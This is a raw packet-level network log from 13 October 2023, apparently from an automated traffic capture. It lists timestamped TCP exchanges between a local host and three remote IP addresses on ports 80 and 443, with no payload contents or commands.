Oct 13, 2023 15:21:12.947563887 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947592974 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947873116 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.947906017 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.947921991 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947951078 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.947987080 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.948033094 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.948381901 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.948415041 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.948434114 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.948465109 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.948524952 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.948571920 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.948892117 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.948925972 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.948942900 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.948972940 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.949350119 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.949399948 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.949424982 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.949456930 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.949475050 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.949503899 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950014114 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950069904 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950108051 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950139999 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950155020 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950177908 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950393915 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950449944 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950467110 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950500011 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950515985 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950540066 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.950898886 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.950954914 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951013088 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.951061964 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951111078 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.951157093 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951423883 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.951483011 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951500893 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.951533079 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.951550007 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951575994 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951808929 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.951864004 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.951955080 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952006102 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952008009 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952069998 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952126026 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952173948 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952191114 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952234983 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952663898 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952721119 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952759027 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952791929 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952809095 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952828884 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.952831984 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952874899 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.952955961 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953005075 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953021049 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953066111 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953598976 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953665018 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953701973 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953733921 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953797102 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953829050 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953845978 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953865051 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953881025 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953917027 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.953933954 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953967094 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.953984976 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954010963 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954066992 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954114914 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954411983 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954462051 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954463959 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954513073 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954528093 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954562902 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954591990 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954595089 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954611063 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954632998 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954864979 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954916954 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.954941988 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954977036 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.954994917 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955012083 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955017090 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955060959 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955353975 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955387115 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955404043 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955423117 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955429077 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955456018 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955468893 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955497980 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955554008 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955586910 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955602884 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955626011 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955887079 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955919027 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.955939054 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955964088 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.955991030 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956024885 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956042051 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956060886 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956070900 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956094027 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956110001 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956151962 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956460953 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956492901 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956521034 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956552982 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956614017 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956645012 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956662893 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956693888 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956713915 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956762075 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956847906 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956880093 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.956897974 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956928015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.956988096 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957019091 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957037926 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957061052 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957115889 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957148075 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957165956 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957189083 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957456112 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957489967 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957510948 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957525015 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957536936 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957559109 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957573891 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957611084 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957654953 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957689047 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957707882 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957731009 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957848072 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957880974 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.957900047 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957930088 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.957961082 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.958008051 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.958090067 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.958121061 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.958143950 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.958165884 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.958178997 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.958220005 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.960613012 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.960633039 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.960728884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.960741043 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.960786104 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.962866068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.962882042 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.962945938 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.962954044 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.962994099 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.966811895 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.966828108 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.966908932 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.966917038 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.966954947 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.969211102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.969228029 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.969302893 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.969311953 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.969355106 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.969355106 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.972075939 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.972093105 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.972161055 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.972170115 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.972206116 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.975852013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.975866079 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.975965023 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.975970984 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.976008892 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.978764057 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.978780031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.978837967 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.978843927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.978880882 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.981794119 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.981807947 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.981859922 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.981865883 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.981895924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.981913090 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.985461950 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.985479116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.985534906 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.985543013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.985575914 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.985590935 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.987607002 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.987622023 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.987668037 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.987673044 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.987706900 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.987734079 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.988501072 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.988517046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.988576889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.988599062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.988640070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.990600109 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.990621090 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.990688086 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.990695000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.990732908 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.993382931 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.993398905 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.993447065 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.993452072 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.993488073 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.996761084 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.996774912 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.996845961 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.996851921 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.996891022 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.999869108 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.999882936 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.999928951 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.999933958 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:12.999958038 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:12.999973059 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.002557039 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.002571106 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.002629995 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.002635002 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.002671957 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.005692959 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.005707026 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.005753994 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.005759954 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.005800962 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.009100914 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.009115934 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.009186983 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.009192944 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.009227991 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.011701107 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.011714935 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.011776924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.011782885 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.011821032 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.014662027 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.014678955 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.014733076 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.014739037 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.014775991 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.017371893 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.017386913 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.017447948 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.017453909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.017488956 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.020960093 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.020975113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.021014929 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.021020889 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.021059990 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.023721933 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.023736000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.023802996 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.023808956 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.023838997 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.026616096 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.026631117 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.026686907 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.026694059 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.026726007 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.030066013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.030091047 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.030139923 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.030144930 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.030189037 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.032985926 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.032999992 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.033061028 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.033067942 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.033104897 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.035923958 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.035943985 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.036020994 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.036031008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.036072969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.098206043 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.098227024 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.098279953 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.098293066 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.098319054 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.098340988 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.100963116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.100977898 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.101028919 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.101035118 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.101064920 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.101083040 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.123497009 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.123513937 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.123579025 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.123586893 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.123621941 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.126111031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.126127005 CEST	443	49739	172.67.213.185	192.168.2.5
